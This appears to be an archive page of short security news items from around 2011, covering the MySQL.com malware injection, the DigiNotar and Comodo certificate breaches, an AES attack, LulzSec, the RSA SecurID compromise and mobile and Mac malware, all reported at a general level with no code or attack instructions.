Privacy, Security Archive

Well, this is embarrassing. MySQL.com has been hacked (fixed by now), and was turned into a platform serving malware to unsuspecting visitors. The criminals did this by injecting a script which redirected visitors to a website which uses the BlackHole exploit pack, which probes the browser used and serves up an appropriate exploit. Computer security blogger Brian Krebs saw root access to MySQL.com being offered for $3000 only a few days ago.

After having its SSL and EVSSL certificates deemed untrustworthy by the most popular browsers, VASCO announced that DigiNotar, filed a voluntary bankruptcy petition and was declared bankrupt today. This is unsurprising, since a report issued by security audit firm Fox-IT, who has been hired to investigate the now notorious DigiNotar breach, revealed that things were far worse than we were led to believe.

"The hack of Dutch certificate authority DigiNotar already bore many similarities to the break-in earlier this year that occurred at a reseller for CA Comodo. Bogus certificates were issued for webmail systems, which were in turn used to intercept Web traffic in Iran. Another similiarity has since emerged: the perpetrator of the earlier attacks is claiming responsibility for the DigiNotar break-in. Calling himself ComodoHacker, the hacker claims that DigiNotar is not the only certificate authority he has broken into. He says that he has broken into GlobalSign, and a further four more CAs that he won't name. He also claimed that at one time he had access to StartCom."

So, people from within Iran have hacked the Dutch company DigiNotar, allowing them to issue fake certificates so they could listen in on Iranian dissidents and other organisation within Iran. This is a very simplified version of the story, since it's all quite complicated and I honestly don't even understand all of it. In any case, DigiNotar detected the intrusion July 19, but didn't really do anything with it until it all blew up in their face this past week. Now, the Dutch government has taken over operational management of DigiNotar... But as a Dutch citizen, that doesn't really fill me with confidence, because, well - whenever the Dutch government does anything even remotely related to IT technology, they mess it up. And mess it up bad.

Linux, which is a very versatile operating environment, caters for an array of different needs of different users. One such specific usage of Linux is in the area of computer security and penetration testing. Among the digital forensic tools available for Linux, BackTrack is well known as an all-in-one platform that offers security professionals all the tools that they may need to carry out various security related tasks.

Researchers have found a weakness in the AES algorithm. They managed to come up with a clever new attack that can recover the secret key four times easier than anticipated by experts. In the last decade, many researchers have tested the security of the AES algorithm, but no flaws were found so far. The new attack applies to all versions of AES even if it used with a single key. The attack shows that finding the key of AES is four times easier than previously believed; in other words, AES-128 is more like AES-126.

Aruba Networks, which provided and maintained the wireless network for last week's Black Hat USA 2011 conference, today provided some interesting statistics around the network's use. Apple devices were most prevalent at 43.3 percent of all devices (28.4 percent alone for iOS iPad and iPhone, with another 14.9 percent running OS X). Linux users composed 35 percent of the total, while Windows users represented 21.8 percent. While the majority of attendees used the Black Hat PSK network, almost 200 attendees utilized the PEAP/EAP-TLS "secured" network. Aruba captured a huge amount of security events, the most interesting of which were IP spoofing, AP spoofing, Power save DoS attacks and Block ACK attacks. Talk about a hostile environment.

A new Trojan horse app has emerged to target Android devices, and this one's particularly creepy. The app records a user's phone calls and then uploads them to a remote server. The app was revealed Tuesday by security researcher Dinesh Venkatesan on the Security Advisor Research Blog, published by CA Technologies, now known as Total Defense. While this particular Trojan doesn't appear to be a threat in the wild--at least not for North American users--it's a good reminder of the growing threat of mobile malware.

ACROS Security has discovered a vulnerability in Sun Java, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the application loading an executable file in an insecure manner when an out of memory condition occurs.

In an unexpected move for a security company, SecurEnvoy today said that cyber break-ins and advanced malware incidents, such as the recent DDoS attack by LulzSec, should actually be welcomed and their initiators applauded. The company's CTO Andy Kemshall said: "I firmly believe that the media attention LulzSec’s DDoS attack has recently received is deserving. It’s thanks to these guys, who’re exposing the blase attitudes of government and businesses without any personal financial gain, that will make a difference in the long term to the security being put in place to protect our own personal data!"

Oh boy, what do we make of this? We haven't paid that much attention to the whole thing as of yet, but with a recent public statement on why they do what they do, I think it's about time to address this thing. Yes, Lulz Security, the hacking group (or whatever they are) that's been causing quite a bit of amok on the web lately.

RSA has finally admitted publicly that the March breach into its systems has resulted in the compromise of their SecurID two-factor authentication tokens. The admission comes in the wake of cyber intrusions into the networks of three US military contractors: Lockheed Martin, L-3 Communications and Northrop Grumman - one of them confirmed by the company, others hinted at by internal warnings and unusual domain name and password reset process.

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the Wi-Fi that your mobile is connected to. It is possible to hijack sessions only when Wi-Fi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for Android and it works on WPA2.

"A little over two weeks have passed since the appearance of MAC Defender, the fake AV solution targeting Mac users. And seeing that the approach had considerable success, it can hardly come as a surprise that attackers chose to replicate it. This time, the name of the rogue AV is Mac Protector, and the downloaded Trojan contains two additional packages. As with MAC Defender, the application requires root privileges to get installed, so the user is asked to enter the password."